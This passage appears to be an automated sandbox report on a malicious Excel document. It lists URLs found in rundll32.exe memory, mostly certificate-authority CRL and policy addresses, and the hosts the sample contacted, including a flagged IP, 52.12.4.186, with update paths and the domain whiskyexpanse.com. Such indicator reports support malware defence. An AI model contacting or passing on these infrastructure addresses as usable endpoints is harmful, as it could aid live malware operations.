      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
      http://www.certifikat.dk/repository00%URL Reputationsafe
      http://www.certifikat.dk/repository00%URL Reputationsafe
      http://www.certifikat.dk/repository00%URL Reputationsafe
      http://www.certifikat.dk/repository00%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
      http://www.sk.ee/cps/00%URL Reputationsafe
      http://www.sk.ee/cps/00%URL Reputationsafe
      http://www.sk.ee/cps/00%URL Reputationsafe
      http://www.sk.ee/cps/00%URL Reputationsafe
      http://www.certicamara.com00%URL Reputationsafe
      http://www.certicamara.com00%URL Reputationsafe
      http://www.certicamara.com00%URL Reputationsafe
      http://www.certicamara.com00%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      whiskyexpanse.com
      		104.21.3.47
      		truefalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.a-cert.at0Erundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.certplus.com/CRL/class3.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.e-me.lv/repository0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.acabogacia.org/doc0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://crl.chambersign.org/chambersroot.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.certifikat.dk/repository0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.chambersign.org1rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.pkioverheid.nl/policies/root-policy0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://repository.swisssign.com/0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          		high
          http://crl.ssc.lt/root-c/cacrl.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://ca.disig.sk/ca/crl/ca_disig.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.certplus.com/CRL/class3P.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://repository.infonotary.com/cps/qcps.html0$rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.post.trust.ie/reposit/cps.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.certplus.com/CRL/class2.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.disig.sk/ca/crl/ca_disig.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://ocsp.infonotary.com/responder.cgi0Vrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.sk.ee/cps/0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.certicamara.com0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.globaltrust.info0=rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		low
          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Erundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.ssc.lt/cps03rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpfalse
            		high
            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://ocsp.pki.gva.es0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.oces.certifikat.dk/oces.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.ssc.lt/root-b/cacrl.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.certicamara.com/dpc/0Zrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
              		high
              http://crl.pki.wellsfargo.com/wsprca.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                		high
                http://www.dnie.es/dpc0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.rootca.or.kr/rca/cps.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.trustcenter.de/guidelines0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.globaltrust.info0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://certificates.starfieldtech.com/repository/1604rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                  		high
                  http://www.certplus.com/CRL/class3TS.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.entrust.net/CRL/Client1.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                    		high
                    http://www.entrust.net/CRL/net1.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpfalse
                        		high
                        https://www.catcert.net/verarrelrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.disig.sk/ca0frundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.e-szigno.hu/RootCA.crlrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                          		high
                          http://www.signatur.rtr.at/current.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            		high
                            http://www.sk.ee/juur/crl/0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.chambersign.org/chambersignroot.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.xrampsecurity.com/XGCA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.quovadis.bm0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.ssc.lt/root-a/cacrl.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.trustdst.com/certificates/policy/ACES-index.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.firmaprofesional.com0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.netlock.net/docsrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://52.12.4.186/hrundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpfalse
                              		high
                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                		high
                                http://cps.chambersign.org/cps/publicnotaryroot.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.e-trust.be/CPS/QNcertsrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.certicamara.com/certicamaraca.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpfalse
                                    		high
                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://52.12.4.186/news/update6rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.entrust.net03rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://cps.chambersign.org/cps/chambersroot.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.acabogacia.org0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ca.sia.it/seccli/repository/CPS0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.securetrust.com/SGCA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.securetrust.com/STCA.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certicamara.com/certicamaraca.crl0;rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.e-szigno.hu/RootCA.crt0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.quovadisglobal.com/cps0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                          		high
                                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpfalse
                                            		high
                                            https://52.12.4.186/news/updateArundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.valicert.com/1rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://52.12.4.186/news/updaterundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.e-szigno.hu/SZSZ/0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.%s.comPArundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://52.12.4.186/news/updateFrundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ocsp.quovadisoffshore.com0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.entrust.net0Drundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://cps.chambersign.org/cps/chambersignroot.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://ca.sia.it/secsrv/repository/CRL.der0Jrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://investor.msn.comrundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpfalse
                                                		high
                                                http://crl.entrust.net/server1.crl0rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.ancert.com/cps0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ca.sia.it/seccli/repository/CRL.der0Jrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.registradores.org/scr/normativa/cp_f2.htm0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                    		high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    52.12.4.186
                                                    		unknownUnited States
                                                    		16509AMAZON-02UStrue
                                                    104.21.3.47
                                                    		whiskyexpanse.comUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:383422
                                                    Start date:07.04.2021
                                                    Start time:18:46:21
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 7m 43s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Documents_460000622_1464906353.xls
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
